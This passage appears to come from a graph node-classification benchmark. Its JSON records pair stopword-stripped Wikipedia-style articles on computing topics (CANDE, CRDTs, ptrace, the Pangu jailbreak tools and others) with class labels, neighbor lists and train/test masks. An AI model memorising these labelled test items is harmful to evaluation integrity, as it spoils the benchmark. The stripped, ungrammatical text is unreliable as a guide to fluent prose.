    "text": "CANDE:cande cande command edit command line shell text editor mcp master control program operating system runs unisys clearpath series mainframes originally implemented burroughs large systems range features interacting operating system execution environment focused executing editing compiling programs creating copying moving renaming deleting files general full name cande mcs mcs message control subsystem general form systems program burroughs architecture mcp master control program core os mcs cande editor provides overall control network users editing capabilities cande anachronistic casual opposed scripted editing predate full screen graphical editors cande provides command-line interpreter line editor although unlike modern interpretation operating system command line interpreter cande commands compiled cande mcs shell like capabilities provided wfl notable features functions include addition features cande on-line help facility extra speed cande implemented user context switching swapping block top stack novel method broke several assumptions built design burroughs large systems particular handling virtual memory descriptors meant cande written dcalgol system-level privileges architecturally cande split two main sections primary single-instanced main process originally supporting 255 simultaneous users one worker stacks main process called bump receives input messages including input users simple requests executed without delay involve i/o disk access handled immediately requests added work queue handled one worker processes worker process called grind one instances time grind process default five pseudo-threads actually carry work internal threading model context switching selects one worker pseudo-threads per grind process makes executing context achieved copying top stack worker process needs execute i/o asynchronous activity initiates action marks waiting calls context-switching function selects different context execution cande operates without internal locks careful separation data possible user connection station assigned index main array called station array sta stay current station index named stax pronounced stay-x multiple words state data per station stored first words together followed second words etc allows cande index array using addition multiplication made faster operation hard-wired cpus era cande originally written 1973 darrel f. high taken randall gellens 1984 point library maintenance file copying moving renaming deleting routines rewritten allow significantly expanded capabilities slew utilities added using syntax allowing used even program running several architectural improvements made later transferred santa barbara plant eventually india syntax originally allowing control program execution input would normally directed program grew include number utilities",
    "neighbors": [
      6529,
      2786,
      3716,
      2533,
      2181,
      1702,
      4900,
      2477,
      7983,
      2002,
      5714,
      11059,
      7325
    ],
    "mask": "None"
  },
  {
    "node_id": 8002,
    "label": 9,
    "text": "Lisp-based_Intelligent_Software_Agents:lisp-based intelligent software agents lisa project platform development lisp-based intelligent software agents lisa production-rule system implemented common lisp object system clos heavily influenced clips java expert system shell jess core reasoning engine based object-oriented implementation rete algorithm efficient mechanism solving difficult many-to-many matching problem intrinsic lisa ability reason clos objects without imposing special class hierarchy requirements thus possible easily augment existing clos applications reasoning capabilities lisa extension common lisp full power lisp environment always available lisa-enabled applications run ansi-compliant common lisp platform",
    "neighbors": [
      6502,
      5677,
      2062,
      9103,
      9877
    ],
    "mask": "Test"
  },
  {
    "node_id": 8003,
    "label": 3,
    "text": "Krait_(CPU):krait cpu krait arm-based central processing unit designed qualcomm included snapdragon s4 snapdragon 400/600/800/801/805 krait 200 krait 300 krait 400 krait 450 system chips introduced 2012 successor scorpion cpu although architectural similarities krait cortex-a15 core designed in-house",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      8815,
      10361,
      638,
      644,
      9863,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      6815,
      2208,
      4258,
      4773,
      9913,
      8383,
      10945,
      196,
      4821,
      2788,
      3301,
      9964,
      1776,
      6391,
      3835,
      2814,
      781,
      6926,
      5417,
      2862,
      7988,
      11062,
      6971,
      10562,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      1428,
      4508,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      10734,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 8004,
    "label": 2,
    "text": "Socket_G3_Memory_Extender:socket g3 memory extender socket g3 memory extender short g3mx planned advanced micro devices solution problem connecting large amounts memory single microprocessor g3mx expected available amd 800s series chipset server market starting 2009 officially cancelled together cancellation socket g3 early 2008 electrical limitations preclude connecting 2 unbuffered ddr sdram dimms 4 buffered dimms single shared bus also impractical manufacture single chip two ddr memory buses channels thus impossible connect 8 dimms single chip typically per-processor limitation well obvious solution use narrower higher-speed bus interface memory implement point-to-point link daisy-chaining additional modules however intel made two attempts neither hugely successful amd answer g3mx chip similar amb intended placed motherboard dimm connect multiple dimms minimize latency designed daisy-chained g3mx asymmetrical link processor match typical memory usage patterns 20 differential signals supply read data processor 13 differential signals receive commands write data totals 66 pins less half required ddr2 ddr3 interface thus processor easily 4 g3mx memory interfaces 4 buffered dimms attached allowing 16 dimms feed one processor",
    "neighbors": [
      3464,
      7058,
      7151
    ],
    "mask": "None"
  },
  {
    "node_id": 8005,
    "label": 7,
    "text": "Instant_WebKiosk:instant webkiosk instant webkiosk operating system based debian gnu/linux designed use web kiosks digital signage 2017-12 binary emotions completely focused raspberry pi operating systems instant webkiosk live operating system pcs macs designed web kiosks browser defaults google chromium locked full-screen mode users may change settings reset typically end session operating system defaults originally defined values operating system designed boot usb flash devices may optionally installed hard drive network access via wired wireless networks system configuration done via web interface raspberry webkiosk port instant webkiosk raspberry pi designed web kiosks raspberry digital signage raspberry slideshow raspberry pi operating systems designed digital signage purposes also originated instant webkiosk code base",
    "neighbors": [
      6371,
      4841,
      5397,
      823,
      1849
    ],
    "mask": "Test"
  },
  {
    "node_id": 8006,
    "label": 1,
    "text": "Autocommit:autocommit context data management autocommit mode operation database connection individual database interaction i.e. sql statement submitted database connection autocommit mode executed transaction implicitly committed sql statement executed autocommit mode rolled back autocommit mode theory incurs per-statement transaction overhead often undesirable performance resource utilization impact nonetheless systems microsoft sql server well connection technologies odbc microsoft ole db autocommit mode default statements change data order ensure individual statements conform acid atomicity-consistency-isolation-durability properties transactions alternative autocommit mode non-autocommit means sql client application responsible issuing transaction initiation start transaction termination commit rollback commands non-autocommit mode enables grouping multiple data manipulation sql commands single atomic transaction dbms e.g mariadb force autocommit every ddl statement even non-autocommit mode ddl statement starts previous dml statements transaction auto committed ddl executed new autocommit transaction following ddl statements new transaction automatically started needed",
    "neighbors": [
      10048,
      4490,
      8683,
      10413,
      853
    ],
    "mask": "None"
  },
  {
    "node_id": 8007,
    "label": 3,
    "text": "Ultra_60:ultra 60 ultra 60 fairly large heavy computer workstation tower enclosure sun microsystems ultra 60 launched november 1997 shipped solaris 7 available several specifications ultra 60 similar higher-cost sun ultra 80 somewhat smaller supports fewer cpus less memory ultra 60 may rack-mounted using optional kit x9627a 560-2548 although generally rack-mounted since ultra 60 designed use workstation rather server details found sun ultra 80 rack mount installation guide enterprise 220r ultra 60 motherboard specialized rackmount case custom power supplies parts ultra 60 longer sold new replaced ultra 45 last order date ultra 60 july 2002 last model shipped 2003 considered sun end life although shipped solaris 7 ultra 60 run later versions solaris 10 well linux various unix operating systems ultra 60 run microsoft windows directly although internal pci card sunpci ii pro similar sun could fitted allow use windows full specifications longer found oracle web site abbreviated specification along extra notes likely useful given ultra 60 came equipped 1 2 cpus cpus run 300,360,450 mhz 16-kb data 16-kb instruction cache chip 2mb 4mb external secondary cache secondary cache size depends cpu model ultra 60 uses 144-pin 5v 60-ns dimm memory modules either 32 64 128 mb installed sets four identical dimms 16 dimm sockets possible fit 2 gb 16 128-mb modules memory bus 576 bits wide 512 bits used data 64 bits error correction specifications give maximum throughput 1.78-gb/s performance improved 2-way interleaving used giving 512 mb 2 gb ultra 60 takes one two 1 high sca scsi disk drives internally sold 18.2-gb 36.4-gb disks practice use sca disk internal disks must mounted carrier spud-bracket sun part number 540-3024 scsi ids internal disks 0 3 set sca backplane changed optional 1.44 mb 3.5 ms-dos/ibm compatible floppy drive fitted optional 644 mb suncd 32x-speed photo cd compatible cd-rom drive optional 10x dvd-rom could specified well many ultra 60s current use fitted rewritable cd-rom drive systems might inoperable pci 2.2 card installed 2 upa graphics slots running 112 mhz supporting one elite3d m3 and/or elite3d m6 graphics options two creator3d graphics options xvr-1000 graphics option officially supported work solaris 9 solaris 10 sun ultra 60 fitted dual channel ultra-3 scsi controller speed 40 mb/s one controller c0 used internal disk cd-rom dvd-rom tape second channel c1 used external 68-pin ultra wide scsi connector rear ultra 60 sun ultra 60 1 gbit/s ethernet used optional sun x1141a ethernet card usb officially supported various usb boards pcs known work linux solaris according hardware specifications sun web site maximum power consumption 380 w. components list lists power supply sun part number 300-1357 sony 670 w 12a power supply well fitted system 2x450mhz 2gb memory elite3d graphics one disk draws 200 watts idle remove 2nd video card 2nd cpu ultra 60 well built workstation use cheap mass-produced commodity pc parts like ultra workstations ultra 5 ultra 10 well cooled suffering none problems overheating like sun previous quad processor machine sparcstation 20 ultra 60 longer sold new sun policy support hardware 5 years date last shipment ultra 60 officially supported october 2007 addition official support knowledgeable people often sun employees regular visitors comp.unix.solaris comp.sys.sun.hardware comp.sys.sun.admin usenet newsgroups",
    "neighbors": [
      3328,
      9731,
      1801,
      4235,
      1809,
      2710,
      1316,
      10789,
      7594,
      1707,
      3247,
      7983,
      6322,
      823,
      1600,
      7104,
      6338,
      9665,
      10436,
      1480,
      2895,
      3919,
      597,
      10327,
      10200,
      4960,
      9955,
      11363,
      11626,
      7148,
      7022,
      1776,
      5233,
      8179,
      9333,
      1399,
      11129,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 8008,
    "label": 3,
    "text": "Conflict-free_replicated_data_type:conflict-free replicated data type distributed computing conflict-free replicated data type crdt data structure replicated across multiple computers network replicas updated independently concurrently without coordination replicas always mathematically possible resolve inconsistencies might result crdt concept formally defined 2011 marc shapiro nuno preguiça carlos baquero marek zawirski development initially motivated collaborative text editing mobile computing crdts also used online chat systems online gambling soundcloud audio distribution platform nosql distributed databases redis riak crdt data types concurrent updates multiple replicas data without coordination computers hosting replicas result inconsistencies replicas general case may resolvable restoring consistency data integrity conflicts updates may require updates entirely partially dropped accordingly much distributed computing focuses problem prevent concurrent updates replicated data another possible approach optimistic replication concurrent updates allowed go inconsistencies possibly created results merged resolved later approach consistency replicas eventually re-established via merges differing replicas optimistic replication might work general case turns significant practically useful class data structures crdts work — mathematically always possible merge resolve concurrent updates different replicas data structure without conflicts makes crdts ideal optimistic replication example one-way boolean event flag trivial crdt one bit value true false true means particular event occurred least false means event occurred set true flag set back false event occurred un-occur resolution method true wins merging replica flag true replica observed event another one flag false replica n't observed event resolved result true — event observed two approaches crdts provide strong eventual consistency operation-based crdts state-based crdts two alternatives equivalent one emulate operation-based crdts require additional guarantees communication middleware namely operations dropped duplicated transmitted replicas though delivered order state-based crdts also disadvantage entire state must transmitted replicas may costly operation-based crdts referred commutative replicated data types cmrdts cmrdt replicas propagate state transmitting update operation example cmrdt single integer might broadcast operations +10 −20 replicas receive updates apply locally operations commutative however idempotent communications infrastructure must therefore ensure operations replica delivered replicas without duplication order pure operation-based crdts variant operation-based crdts reduces metadata size state-based crdts called convergent replicated data types cvrdts contrast cmrdts cvrdts send full local state replicas states merged function must commutative associative idempotent merge function provides join pair replica states set states forms semilattice update function must monotonically increase internal state according partial order rules semilattice delta state crdts simply delta crdts optimized state-based crdts recently applied changes state disseminated instead entire state cmrdts place requirements protocol transmitting operations replicas use less bandwidth cvrdts number transactions small comparison size internal state however since cvrdt merge function associative merging state replica yields previous updates replica gossip protocols work well propagating cvrdt state replicas reducing network use handling topology changes lower bounds storage complexity state-based crdts known payload integer n p cvrdt implements counter cluster n nodes node cluster assigned id 0 n 1 retrieved call myid thus node assigned slot array p increments locally updates propagated background merged taking max every element p. compare function included illustrate partial order states merge function commutative associative idempotent update function monotonically increases internal state according compare function thus correctly-defined cvrdt provide strong eventual consistency cmrdt equivalent broadcasts increment operations received payload integer n p integer n n common strategy crdt development combine multiple crdts make complex crdt case two g-counters combined create data type supporting increment decrement operations p g-counter counts increments n g-counter counts decrements value pn-counter value p counter minus value n counter merge handled letting merged p counter merge two p g-counters similarly n counters note crdt internal state must increase monotonically even though external state exposed query return previous values payload set g-set grow-only set set allows adds element added removed merger two g-sets union payload set set r two g-sets grow-only sets combined create 2p-set addition remove set called tombstone set elements added also removed removed element re-added element e tombstone set query never return true element 2p-set uses remove-wins semantics remove e takes precedence add e lww-element-set similar 2p-set consists add set remove set timestamp element elements added lww-element-set inserting element add set timestamp elements removed lww-element-set added remove set timestamp element member lww-element-set add set either remove set remove set earlier timestamp latest timestamp add set merging two replicas lww-element-set consists taking union add sets union remove sets timestamps equal bias lww-element-set comes play lww-element-set biased towards adds removals advantage lww-element-set 2p-set unlike 2p-set lww-element-set allows element reinserted removed or-set resembles lww-element-set using unique tags instead timestamps element set list add-tags list remove-tags maintained element inserted or-set new unique tag generated added add-tag list element elements removed or-set tags element add-tag list added element remove-tag tombstone list merge two or-sets element let add-tag list union two add-tag lists likewise two remove-tag lists element member set add-tag list less remove-tag list nonempty optimization eliminates need maintaining tombstone set possible avoids potentially unbounded growth tombstone set optimization achieved maintaining vector timestamps replica sequence list ordered set crdt used build collaborative real-time editor alternative operational transformation ot known sequence crdts treedoc rga woot logoot lseq crate decentralized real-time editor built top lseq runnable network browsers using webrtc logootsplit proposed extension logoot order reduce metadata sequence crdts mute online web-based peer-to-peer real-time collaborative editor relying logootsplit algorithm redis distributed highly available scalable in-memory database uses crdts implementing globally distributed databases based fully compatible redis open source soundcloud open-sourced roshi lww-element-set crdt soundcloud stream implemented top redis riak distributed nosql key-value data store based crdts league legends uses riak crdt implementation in-game chat system handles 7.5 million concurrent users 11,000 messages per second bet365 largest european on-line betting company 2.5 million simultaneous users peak stores hundreds megabytes data riak implementation or-set tomtom employs crdts synchronize navigation data devices user phoenix web framework web framework written elixir uses crdts support real time multi-node information sharing version 1.2 facebook implements crdts apollo low-latency consistency scale database teletype atom employs crdts enable developers share workspace team members collaborate code real time microsoft cosmos db uses crdts enable multi-master write mode haja networks orbitdb uses operation-based crdts core data structure ipfs-log apple implements crdts notes app syncing offline edits multiple devices",
    "neighbors": [
      9224,
      19,
      7347,
      7446,
      1049
    ],
    "mask": "None"
  },
  {
    "node_id": 8009,
    "label": 4,
    "text": "CyberPatriot:cyberpatriot cyberpatriot national youth cyber education program created united states help direct students toward careers cybersecurity science technology engineering mathematics disciplines program created air force association afa features annual national youth cyber defense competition high school middle school students national youth cyber defense competition eleventh season called cyberpatriot xi indicating season competition cyberpatriot xi open high schools middle schools accredited home school programs around country jrotc units services civil air patrol squadrons naval sea cadet corps divisions may also participate competition outside regular competition cyberpatriot also hosts two additional sub-programs summer cybercamps elementary school cyber education initiative northrop grumman foundation presenting sponsor spin program run uk called cyber centurion cyberpatriot began 2009 proof concept demonstration afa ’ air warfare symposium orlando florida nine high school civil air patrol squadrons competed second phase program limited air force afjrotc civil air patrol teams online training qualification competitions held fall 2009 nearly 200 teams 44 states competing eight slots in-person national finals competition february 2010 held orlando florida final phase developmental program full national deployment underway 1,500 teams 50 states canada dod dependant schools overseas competed cyberpatriot vi cyberpatriot vii began october 2014 2,100 teams registered compete new division middle school division added season cyberpatriot ix started october 2016 featured 4,300 registered teams cyberpatriot designed accessible high school middle school student provides path high school college workforce benefits cyberpatriot partners nation program increases awareness cybersecurity delivering basic cybersecurity education competitive format enhances leadership communication cooperation skills among competitors teams following members team required registered coach registered competitors coach registration begins late spring allow preparation summer qualification rounds competition completed online teams ’ home locations september early january competition tournament structure three divisions early rounds competition done online weekends via internet teams ’ schools sponsoring organizations ’ facilities prior round teams download virtual image representations operating systems known flaws cybersecurity vulnerabilities team tasked find flaws keeping specified computer functions services email working team progress recorded central cyberpatriot scoring system scores qualification rounds 1 2 totaled determine tier team advances teams platinum tier teams eligible qualify national finals see additional rules top scoring semifinal teams division approximately 28 teams invited all-expenses paid in-person national finals competition spring cyberpatriot iv vii national finals competitions held gaylord national hotel convention center national harbor maryland beginning cyberpatriot viii season national finals competitions moved hyatt regency inner harbor baltimore maryland challenges teams may face include winning teams open service division earn education grants school choice first place teams earn 2,000 per competitor second place teams earn 1,500 per competitor third place earns 1,000 per competitor scholarship money provided northrop grumman corp cyberpatriot vii first second third place additional 2,000 1,500 1,000 awarded teams respectively national security agency",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 8010,
    "label": 3,
    "text": "Alpha_Blaster:alpha blaster alpha blaster fixed shooter video game developed dave aron sumlock vic-20 home computer published livewire software 1983 aackosoft published msx adaptation game following year alpha blaster derivative galaxian 1979 player defends alien invasion fleet planet alpha piloting lone federation battle cruiser player scores points shooting flying saucers spacecraft laser cannon craft laser energy fuel limited surviving two waves attacks player must dodge blast debris cruiser flies asteroid belt player passes asteroid belt cruiser docks supply ship rearm refuel cycle game difficulty level increases",
    "neighbors": [
      10931,
      9006,
      10287
    ],
    "mask": "Test"
  },
  {
    "node_id": 8011,
    "label": 9,
    "text": "SAS_language:sas language sas language computer programming language used statistical analysis created anthony james barr north carolina state university read data common spreadsheets databases output results statistical analyses tables graphs rtf html pdf documents sas language runs compilers used microsoft windows linux various unix mainframe computers sas system world programming system wps sas language compilers",
    "neighbors": [
      1952,
      963,
      8262,
      6797,
      8627,
      823,
      4667,
      2652
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8012,
    "label": 2,
    "text": "Ptrace:ptrace ptrace system call found unix several unix-like operating systems using ptrace name abbreviation process trace one process control another enabling controller inspect manipulate internal state target ptrace used debuggers code-analysis tools mostly aids software development ptrace used debuggers gdb dbx tracing tools like strace ltrace code coverage tools ptrace also used specialized programs patch running programs avoid unfixed bugs overcome security features used sandbox run-time environment simulator like emulating root access non-root software attaching another process using ptrace call tool extensive control operation target includes manipulation file descriptors memory registers single-step target code observe intercept system calls results manipulate target signal handlers receive send signals behalf ability write target memory allows data store changed also application code segment allowing controller install breakpoints patch running code target ability inspect alter another process powerful ptrace attach processes owner send signals typically processes superuser account ptrace almost process except init kernels 2.6.26 linux systems feature capabilities-based security ability ptrace limited cap_sys_ptrace capability yama linux security module freebsd limited freebsd jails mandatory access control policies communications controller target take place using repeated calls ptrace passing small fixed-size block memory two necessitating two context switches per call acutely inefficient accessing large amounts target memory done word sized blocks ptrace call word reason 8th edition unix introduced procfs allows permitted processes direct access memory another process 4.4bsd followed use /proc debugger support inherited solaris bsd aix mostly copied linux solaris removed ptrace system call altogether retaining library call reinterprets calls ptrace terms platform procfs systems use ioctls file descriptor opened /proc file issue commands controlled process freebsd hand extended ptrace remove mentioned problems declared procfs obsolete due inherent design problems ptrace provides basic interface necessary support debuggers similar tools programs using must intimate knowledge specifics os architecture including stack layout application binary interface system call mechanism name mangling format debug data responsible understanding disassembling machine code programs inject executable code target process like gdb allow user enter commands executed context target must generate load code generally without help program loader ptrace first implemented version 6 unix present svr4 4.3bsd branches unix ptrace available system call irix ibm aix netbsd freebsd openbsd linux ptrace implemented library call solaris built solaris kernel procfs filesystem sun notes ptrace solaris intended compatibility recommends new implementations use richer interface proc supplies instead unixware also features limited ptrace like sun sco recommends implementers use underlying procfs features instead hp-ux supported ptrace release 11i v3 deprecated favour ttrace similar os-specific call 11i v1 starting ubuntu 10.10 ptrace allowed called child processes apple mac os x also implements ptrace system call apple version adds special option pt_deny_attach — process invokes option subsequent attempts ptrace process fail apple uses feature limit use debuggers programs manipulate drm-ed content including itunes pt_deny_attach also disables dtrace ability monitor process debuggers os x typically use combination ptrace mach vm thread apis ptrace pt_deny_attach available developers apple iphone linux also gives processes ability prevent processes attaching processes call prctl syscall clear pr_set_dumpable flag later kernels prevents non-root processes ptracing calling process openssh authentication agent uses mechanism prevent ssh session hijacking via ptrace later ubuntu versions ship linux kernel configured prevent ptrace attaches processes traced process parent allows gdb strace continue work running target process prevents attaching unrelated running process control feature performed via /proc/sys/kernel/yama/ptrace_scope setting systems feature enabled commands like gdb -- attach strace -p work android phones locked boot loader ptrace used gain control init process enable '2nd boot replace system files",
    "neighbors": [
      9732,
      8966,
      10631,
      7561,
      5771,
      2061,
      5397,
      1304,
      6813,
      3487,
      3488,
      6829,
      7983,
      10933,
      823,
      9911,
      700,
      1724,
      9665,
      9921,
      4423,
      8395,
      6369,
      2275,
      4972,
      11506,
      5492,
      7421
    ],
    "mask": "Test"
  },
  {
    "node_id": 8013,
    "label": 8,
    "text": "OPeNDAP:opendap opendap acronym open-source project network data access protocol endeavor focused enhancing retrieval remote structured data web-based architecture discipline-neutral data access protocol dap widely used especially earth science protocol layered http current specification dap4 though previous dap2 version remains broadly used developed advanced openly collaboratively non-profit opendap inc. dap intended enable remote selective data-retrieval easily invoked web service opendap inc. also develops maintains zero-cost reference implementations dap protocol server-side client-side software opendap often used place dap denote protocol also may refer entire dap-based data-retrieval architecture dap-centered architectures thredds erddap noaa geo-ide uaf erddap exhibit significant interoperability one another well systems employing opendap open-source servers software dap client ordinary browser even spreadsheet though limited functionality see opendap web page available client software typically dap clients regardless types whether developed commercially end-user clients almost universally link dap servers libraries implement dap2 dap4 protocol one language another opendap offers open-source libraries c++ java many clients rely community developed libraries pydap especially netcdf suite developed maintained unidata program ucar multiple programming languages netcdf libraries include embedded capabilities retrieving array-style data dap servers data-using client references data set url requests metadata content issuing usually embedded dap library http request dap server content requests usually preceded requests metadata describing structure details referenced data set information client may construct dap constraint expressions retrieve specific content i.e. subsets source opendap servers offer various types responses depending specific form client request including xml json html ascii response requests content opendap servers respond multi-part mime documents include binary portion netcdf dap-native encoding binary forms offer compact means deliver large volumes content dap-native form may even streamed desired opendap software building dap servers top apache dubbed hyrax includes adapters facilitate serving wide variety source data dap servers frequently enable remote access large hdf netcdf files source data exist databases formats including user-defined ones source data organized files dap retrievals enable via subsetting finer-grained access ftp furthermore opendap servers aggregate subsets multiple files delivery single retrieval taken together subsetting aggregation streaming yield substantial data-access efficiencies even presence slow networks opendap dap servers used operationally government agencies including nasa noaa providing access earth science data including satellite imagery high-volume information sources dap data model embraces comprehensive set data structures including multidimensional arrays nested sequences i.e. records complemented correspondingly rich set constraint expressions hence opendap data-retrieval architecture demonstrated utility across broad range scientific data types including data generated via simulations data generated via observations whether remotely sensed measured situ",
    "neighbors": [
      7364,
      10791,
      5677,
      7580,
      7326
    ],
    "mask": "Train"
  },
  {
    "node_id": 8014,
    "label": 4,
    "text": "Pangu_Team:pangu team pangu team chinese programming team ios community developed pangu jailbreaking tools tools assist users bypassing device restrictions enabling root access ios operating system permits user install applications customizations typically unavailable official ios app store versions chinese mythology name usaama pan gu chinese word first living creator pangu pangu jailbreak ios 7.1 7.1.x free ios jailbreaking tool developed pangu team capable executing jailbreaks various ios 7.1 devices ipod touch iphone ipad using various exploits tool first released 23 june 2014 jailbreak ios 7.1 ios devices new fourth generation apple tv tvos 9.0 9.0.1 initial release tool included support ios 7.1.2 team suspected firmware update imminent apple would use release patch vulnerabilities used tool pangu uses revoked enterprise certificate inject jailbreak removed jailbreak complete initial release v1.0.0 25pp chinese cracked app store would installed user uncheck check box checked default installation 25pp removed package version 1.1.0 originally v1.0.0 pangu achieved jailbreaking using infoleak vulnerability taken stefan esser aka i0n1c paid security training sessions along vulnerabilities found although team acknowledges esser help within pangu jailbreak tool esser took twitter let everyone know way okay pangu using exploit discovered one pangu members daniel_k4 later responded public one asked sign nda paid security training sessions infoleak bug known everyone attended security training sessions daniel_k4 said found similar vulnerability infoleak used since n't want disclose new vulnerabilities infoleak bug used bypass kaslr make untethered jailbreak alone team said never thought using learned paid class would wrong pangu offered esser another vulnerability compensation received response thus since version 1.1.0 release esser infoleak replaced another vulnerability found pangu pangu8 pangu jailbreak ios 8.0 8.1 free ios 8 jailbreak tool pangu team first released october 22 2014 tool compatible devices capable running ios 8 iphone 6 iphone 6 plus ipad mini 3 ipad air 2 currently available chinese english cydia included initial release package added v1.1.0 available pangu website since cydia incompatible initial release pangu8 included pangu app allows users install cydia alongside various pangu bug fixes recommended software tool works tweaking utility also recommends tools openssh cydia installed pangu app removed device removing pangu loader ios cydia respringing device uninstalling pangu app removing pangu jailbreak ios users remove pangu jailbreak restore device latest ios version moreover difficult downgrade ios device back previous ios version apple stops signing old ios versions release newer ios firmware initial releases also enabled cydia installed debian package file instead within pangu app alternative pangu9 pangu jailbreak ios 9.0 9.1 latest free ios 9 jailbreak tool pangu team first released october 14 2015 included jailbreak ios 9.0 9.0.2 march 11 2016 pangu released pangu9 v1.3.0 included jailbreak ios 9.1 tool capable jailbreaking devices running ios 9.0 64-bit devices running ios 9.1 currently available english windows os x versions available cydia bundled pangu9 first release removing need pangu app found previous pangu jailbreaks released july 24 2016 pp25 also known pangu9 new pangu9 jailbreak ios 9.2 9.3.3 supported 64-bit devices supported ipod 6th gen ipad pro 1st release application known pp assistant chinese program install cracked apps pangu jailbreak bundled pp assistant option install pp25 app device jailbreak process ask apple id used install unofficial app jailbreak english version released adding support ipod 6th gen ipad pro likely add support 32-bit apple corrected iomobileframebuffer bug ios 9.3.4 released august 4 2016 “ team pangu ” credited source update official security notes apple states available iphone 4s later ipad 2 later ipod touch 5th generation later impact application may able execute arbitrary code kernel privileges description memory corruption issue addressed improved memory handling cve-2016-4654 team pangu like ios 9.x releases ios 9.3.4 designed iphone 4s later ipad 2 later ipad mini later ipad pro range 5th generation ipod touch later outsiders recommend upgrade ios 9.3.3 ios 9.3.4 jailbreak pangu9 ios 9 9.1 worked allowing access photos app able install unsigned application cydia pangu9 ios 9.2 9.3.3 used similar exploit allowing notifications enabled installation cydia used app bundled pp25 allowed jailbreak without use computer",
    "neighbors": [
      10755,
      6023,
      9063,
      10631,
      6186,
      7983,
      1299,
      3286,
      700,
      4957
    ],
    "mask": "None"
  },
  {
    "node_id": 8015,
    "label": 2,
    "text": "Message_loop_in_Microsoft_Windows:message loop microsoft windows message loop obligatory section code every program uses graphical user interface microsoft windows windows programs gui event-driven windows maintains individual message queue thread created window usually first thread creates windows windows places messages queue whenever mouse activity occurs thread window whenever keyboard activity occurs window focus times process also add messages queue accept user input reasons thread window must continuously retrieve messages queue act programmer makes process writing loop calls getmessage blocks message retrieves calls dispatchmessage dispatches message repeats indefinitely message loop usually message loop main program runs main thread additional message loop created modal dialog messages every window process pass message queue handled message loop message loop one kind event loop basic message loop appears follows conventional event loop call translatemessage message translate virtual keystrokes strings calling translatemessage technically required problems result called message loop must call dispatchmessage message loop directly act messages handles dispatches calling dispatchmessage transfers message window procedure window message addressed window procedure callback procedure got associated window class registered one window use window procedure code also send messages directly window procedure called nonqueued messages strict message loop option code elsewhere program also accept dispatch messages peekmessage non-blocking call returns immediately message waiting message none waiting waitmessage allows thread sleep message queue modern graphical interface frameworks windows forms windows presentation foundation mfc delphi qt others require applications code windows message loop automatically route events key presses mouse clicks appropriate handlers defined within framework however framework implements message loop somewhere message loop usually accessed replaced direct control required",
    "neighbors": [
      1348,
      5029,
      2603,
      6797,
      1113,
      10654
    ],
    "mask": "Test"
  },
  {
    "node_id": 8016,
    "label": 7,
    "text": "Le_Select:le select le select framework prototype accessing data heterogeneous nature invoking data processing program internet/intranet environments 1 le select middleware software system designed intention providing organised platform access distributed data software resources unlike data warehouses attempt collect data central location usually single format data structure le select mediator aims provide connection data le select based distributed computing system fully distributed architecture le select global repository global schema data published le select viewed users tuples relational table regardless native data format could flat file spreadsheet wrappers software modules used le select translate data native format relational format viewed users also contain information locate data server access formed set java classes additional xml definition files designed wrappers serve similar purposes re-written rather developer start scratch le select based fully distributed system architecture program run one le select server whilst using data another server system sends data server program running coordinates execution sends back results client relational table user view le select data standard web-browser form tuples relational database additional capabilities include provision sql search abilities le select form middleware software based fully distributed system architecture allows users publish consult wide range data queried accessed remotely via internet",
    "neighbors": [
      9397,
      5677,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8017,
    "label": 4,
    "text": "Ntrepid:ntrepid ntrepid american software hardware cyber security company registered florida based herndon virginia 2008 anonymizer company acquired abraxas corporation purchased cubic 2010 124 million abraxas former employees left form ntrepid year lance cottrell founder anonymizer chief scientist ntrepid anonymizer wholly owned ntrepid march 2011 ntrepid 2.76 million contract u.s. military online persona management contract creation technology would allow blogging activities websites exclusively outside united states counter violent extremist enemy propaganda would allow one operator anonymously create control ten personas one computer project overseen u.s. central command centcom whose spokesman commander bill speaks stated operation would carried arabic persian urdu project thought connected operation earnest voice",
    "neighbors": [
      8320,
      149,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8018,
    "label": 4,
    "text": "Qualified_electronic_signature:qualified electronic signature qualified electronic signature electronic signature compliant eu regulation 910/2014 eidas regulation electronic transactions within internal european market enables verify authorship declaration electronic data exchange long periods time qualified electronic signatures considered digital equivalent handwritten signatures purpose eidas create set standards ensure electronic signatures could used secure manner conducting business online conducting official business across borders eu member states qualified electronic signature one standard outlined eidas qualified electronic signature advanced electronic signature qualified digital certificate created qualified signature creation device qscd electronic signature considered qualified electronic signature must meet three main requirements first signatory must linked uniquely identified signature second point data used create signature must sole control signatory last must ability identify data accompanies signature tampered since signing message important note creating qualified electronic signature merely adding qualified certificate advanced electronic signature signature must also created using qualified signature creation device qscd device responsible qualifying digital signatures using specific hardware software ensures signatory control private key addition qualified trust service provider manages signature creation data produced signature creation data must remain unique confidential protected forgery qualified electronic signatures comply eidas may technically implemented three specific digital signature standards xades pades cades developed european telecommunications standards institute etsi need complemented qualified digital certificate procedures described qualified trust service provider crucial role process qualified electronic signing trust service provider must receive qualified status supervisory governmental body allows entity provide qualified trust services used creating qualified electronic signatures regulated eidas european union published eu trust list constitutive effect meaning provider service qualified appears trusted list qualified trust service providers required abide strict guidelines outlined eidas regulation include part certificate creation process eidas intent implementation qualified electronic signatures serve several purposes facilitation business public services processes including go across borders processes safely expedited using electronic signing eidas eu member states charged establishing points single contact pscs trust services ensure electronic id schemes may used cross-border public sector transactions exchanging accessing healthcare information across borders previously signatory would sign document message return intended recipient via postal service facsimile service hand scanning attaching email issue methods always secure timely delays delivery could occur exists possibility signatures could forged enclosed documents may altered risk increases multiple signatures required different people may located different locations problems alleviated using qualified electronic signatures save time legally binding provide higher level technical security increased transparency electronic signing transaction process enhanced interoperability expected spur innovation european internal market eidas requires electronic signature denied legal effect admissibility evidence solely grounds electronic form meet requirements qualified electronic signatures qualified electronic signature shall equivalent legal effect handwritten signature evidentiary value depends circumstances normally considered high eu member states required recognize qualified electronic signature valid long created qualified 